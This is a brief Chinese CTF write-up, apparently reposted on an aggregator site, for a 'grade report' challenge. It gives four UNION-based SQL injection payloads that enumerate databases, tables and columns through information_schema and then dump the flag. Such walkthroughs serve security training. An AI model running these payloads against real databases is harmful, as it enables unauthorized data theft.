ctf实验平台-成绩单
生活随笔
收集整理的這篇文章主要介紹了
ctf实验平台-成绩单
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
?
題目鏈接:http://120.24.86.145:8002/chengjidan/
平臺地址:http://123.206.31.85/
第一步:暴庫
id=-1' union select 1,2,3,group_concat(schema_name) from information_schema.schemata#
第二步:爆表
id=-1' union select 1,2,3,table_name from information_schema.tables where table_schema=0x736b6374665f666c6167#
第三步:爆字段
id=-1' union select 1,2,3,column_name from information_schema.columns where table_name=0x666c3467#
第四步:爆內容
id=-1' union select 1,2,3,group_concat(skctf_flag) from skctf_flag.fl4g#
?本文固定鏈接:http://www.cnblogs.com/hell0w/p/7906711.html
轉載于:https://www.cnblogs.com/hell0w/p/7906711.html
總結
以上是生活随笔為你收集整理的ctf实验平台-成绩单的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Spark SQL的整体实现逻辑
- 下一篇: VS封装给Unity使用的DLL